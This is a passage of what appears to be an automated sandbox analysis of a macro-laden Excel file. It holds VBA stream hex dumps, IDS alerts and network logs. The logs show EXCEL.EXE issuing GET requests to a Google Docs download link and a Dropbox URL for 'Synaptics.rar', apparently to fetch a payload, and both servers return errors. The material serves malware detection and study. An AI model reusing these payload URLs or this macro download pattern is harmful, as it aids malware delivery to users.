                                  Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 07 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 05 00 00 7e 66 00 00 7f 00 00 00 00
                                  General
                                  Stream Path:VBA/__SRP_1
                                  CLSID:
                                  File Type:data
                                  Stream Size:298
                                  Entropy:3.310015148206106
                                  Base64 Encoded:False
                                  Data ASCII:r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . C a n c e l . . . . . . . . S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T a r g e t . . . . . . . . S a v e A s U I . . . . . . . . D I R . . . . . . . . i _ R e g K e y . . . . . . . . i _ V a l u e . . . . . . . . i _ T y p e . . . . . . . . M Y U . . . . . . . . N M A . . . . . . . . . .
                                  Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 19 03 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 06 00 00 00 43 61 6e 63 65 6c 01 00 00 08 02 00 00 00 53 68 03 00
                                  General
                                  Stream Path:VBA/__SRP_2
                                  CLSID:
                                  File Type:data
                                  Stream Size:1284
                                  Entropy:2.289242959637628
                                  Base64 Encoded:False
                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . 8 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . .
                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 0c 00 0c 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2f 00 38 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06
                                  General
                                  Stream Path:VBA/__SRP_3
                                  CLSID:
                                  File Type:data
                                  Stream Size:682
                                  Entropy:3.010107002295994
                                  Base64 Encoded:False
                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . X . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . \\ . . . . . . . . . . . . . . . . . . # 0 . . . . . . . . . . . ` . . ` . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ` . . d . ( . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . h . , . . . . . . . . . . . . . . . . . . , . A . . . . . . . . . . ` . . l . 0 . . . . . .
                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 58 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 00 5c 04 20 00 ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01
                                  General
                                  Stream Path:VBA/dir
                                  CLSID:
                                  File Type:data
                                  Stream Size:481
                                  Entropy:6.240073968176633
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . v V . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                  Data Raw:01 dd b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 b8 76 56 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-30T11:00:07.485893+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049720142.250.185.174443TCP
                                  2024-12-30T11:00:08.521146+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049727162.125.66.18443TCP
                                  2024-12-30T11:00:09.629313+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049739162.125.66.18443TCP
                                  2024-12-30T11:01:18.391808+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050016142.250.185.174443TCP
                                  2024-12-30T11:01:19.421194+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050017162.125.66.18443TCP
                                  2024-12-30T11:01:20.511491+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050018162.125.66.18443TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 30, 2024 11:00:06.853244066 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:06.853275061 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:06.853419065 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:06.853756905 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:06.853771925 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.485820055 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.485893011 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.486610889 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.486668110 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.489548922 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.489557028 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.489809990 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.491092920 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.535329103 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.894872904 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.894917965 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.895068884 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.895080090 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.896707058 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.896838903 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.896838903 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.896936893 CET49720443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:00:07.896950006 CET44349720142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:00:07.919028997 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:07.919048071 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:07.919107914 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:07.919383049 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:07.919393063 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.521073103 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.521146059 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.523893118 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.523906946 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.524182081 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.535248041 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.575375080 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.970976114 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.971043110 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.971100092 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.971693993 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.971716881 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:08.971730947 CET49727443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:08.971736908 CET44349727162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.020360947 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.020401955 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.020530939 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.020847082 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.020854950 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.629235983 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.629312992 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.630820036 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.630827904 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.631112099 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:09.632554054 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:09.679337978 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:10.085007906 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:10.085118055 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:10.085179090 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:10.085403919 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:10.085426092 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:00:10.085438967 CET49739443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:00:10.085444927 CET44349739162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:17.787264109 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:17.787287951 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:17.787362099 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:17.787849903 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:17.787863016 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.391741991 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.391808033 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.392461061 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.392523050 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.406657934 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.406668901 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.406915903 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.409939051 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.451348066 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.796210051 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.796261072 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.796320915 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.796334982 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.798082113 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.798135996 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.798224926 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.798242092 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.798253059 CET50016443192.168.2.10142.250.185.174
                                  Dec 30, 2024 11:01:18.798258066 CET44350016142.250.185.174192.168.2.10
                                  Dec 30, 2024 11:01:18.823673964 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:18.823694944 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:18.823822021 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:18.824353933 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:18.824362993 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.421077967 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.421194077 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.422775984 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.422801018 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.423055887 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.424360037 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.471335888 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.879765034 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.879829884 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.879904032 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.880186081 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.880211115 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.880223036 CET50017443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.880229950 CET44350017162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.894680977 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.894727945 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:19.894808054 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.895153046 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:19.895169973 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.511401892 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.511491060 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.512999058 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.513012886 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.513257980 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.514534950 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.559344053 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.976881981 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.976955891 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.977024078 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.977360010 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.977385998 CET44350018162.125.66.18192.168.2.10
                                  Dec 30, 2024 11:01:20.977400064 CET50018443192.168.2.10162.125.66.18
                                  Dec 30, 2024 11:01:20.977406025 CET44350018162.125.66.18192.168.2.10
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 30, 2024 11:00:06.845681906 CET5601953192.168.2.101.1.1.1
                                  Dec 30, 2024 11:00:06.852587938 CET53560191.1.1.1192.168.2.10
                                  Dec 30, 2024 11:00:07.911158085 CET4985953192.168.2.101.1.1.1
                                  Dec 30, 2024 11:00:07.918339968 CET53498591.1.1.1192.168.2.10
                                  Dec 30, 2024 11:01:18.815875053 CET6101853192.168.2.101.1.1.1
                                  Dec 30, 2024 11:01:18.822737932 CET53610181.1.1.1192.168.2.10
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 30, 2024 11:00:06.845681906 CET192.168.2.101.1.1.10xd0b2Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:00:07.911158085 CET192.168.2.101.1.1.10x2426Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:01:18.815875053 CET192.168.2.101.1.1.10x6e6bStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 30, 2024 11:00:04.828219891 CET1.1.1.1192.168.2.100x826cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Dec 30, 2024 11:00:04.828219891 CET1.1.1.1192.168.2.100x826cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:00:06.642927885 CET1.1.1.1192.168.2.100x67a0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:00:06.642927885 CET1.1.1.1192.168.2.100x67a0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:00:06.852587938 CET1.1.1.1192.168.2.100xd0b2No error (0)docs.google.com142.250.185.174A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:00:07.918339968 CET1.1.1.1192.168.2.100x2426No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                  Dec 30, 2024 11:00:07.918339968 CET1.1.1.1192.168.2.100x2426No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:01:09.765424967 CET1.1.1.1192.168.2.100x6bc9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Dec 30, 2024 11:01:09.765424967 CET1.1.1.1192.168.2.100x6bc9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                  Dec 30, 2024 11:01:18.822737932 CET1.1.1.1192.168.2.100x6e6bNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                  Dec 30, 2024 11:01:18.822737932 CET1.1.1.1192.168.2.100x6e6bNo error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                  • docs.google.com
                                  • www.dropbox.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.1049720142.250.185.1744437300C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:00:07 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: docs.google.com
                                  2024-12-30 10:00:07 UTC1223INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Dec 2024 10:00:07 GMT
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'nonce-BhbZlCXHIgR6LwUQ3SMOpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  X-XSS-Protection: 0
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-30 10:00:07 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                                  Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                                  2024-12-30 10:00:07 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 77 68 6d 6d 4c 58 78 6c 38 72 59 59 5a 32 45 42 72 4a 57 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                                  Data Ascii: tle><style nonce="swhmmLXxl8rYYZ2EBrJWKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                                  2024-12-30 10:00:07 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                  Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                  2024-12-30 10:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.1049727162.125.66.184437300C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:00:08 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: www.dropbox.com
                                  2024-12-30 10:00:08 UTC825INHTTP/1.1 409 Conflict
                                  Content-Security-Policy: script-src 'none'
                                  Content-Security-Policy: sandbox
                                  Pragma: no-cache
                                  Referrer-Policy: strict-origin-when-cross-origin
                                  Set-Cookie: gvc=MTgyNDM5MzY5NzY2NTU2MDkzMzA0Mjg4ODE3NTA2OTk3MDQ5NzI1; Path=/; Expires=Sat, 29 Dec 2029 10:00:08 GMT; HttpOnly; Secure; SameSite=None
                                  X-Content-Type-Options: nosniff
                                  X-Permitted-Cross-Domain-Policies: none
                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                  X-Xss-Protection: 1; mode=block
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1121
                                  Date: Mon, 30 Dec 2024 10:00:08 GMT
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                  Server: envoy
                                  Cache-Control: no-cache, no-store
                                  Vary: Accept-Encoding
                                  X-Dropbox-Response-Origin: far_remote
                                  X-Dropbox-Request-Id: b77d48069c7941908ef7d0e52e0a4ca8
                                  Connection: close
                                  2024-12-30 10:00:08 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                  Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.1049739162.125.66.184437300C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-12-30 10:00:09 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                                  Host: www.dropbox.com
                                  2024-12-30 10:00:10 UTC825INHTTP/1.1 409 Conflict
                                  Content-Security-Policy: script-src 'none'
                                  Content-Security-Policy: sandbox
                                  Pragma: no-cache
                                  Referrer-Policy: strict-origin-when-cross-origin
